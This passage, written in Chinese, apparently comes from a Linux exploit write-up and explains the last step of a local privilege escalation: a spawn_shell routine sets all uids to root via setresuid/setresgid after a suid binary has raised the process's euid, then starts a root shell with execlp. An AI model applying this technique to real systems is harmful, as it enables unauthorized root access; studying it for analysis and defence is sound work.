在 spawn_shell 函数里，它首先使用 setresgid/setresuid 将本进程的 real uid/effective uid/save uid 都变成 root, 由于 task C 刚刚已经执行了 suid binary 将自身的 euid 变成了 root, 所以这里的 setresuid/setresgid 可以成功执行，到此为止， task C 就变成了一个完全的 root 进程，最后再执行 execlp 启动一个 shell, 即得到了一个完整 root 权限的 shell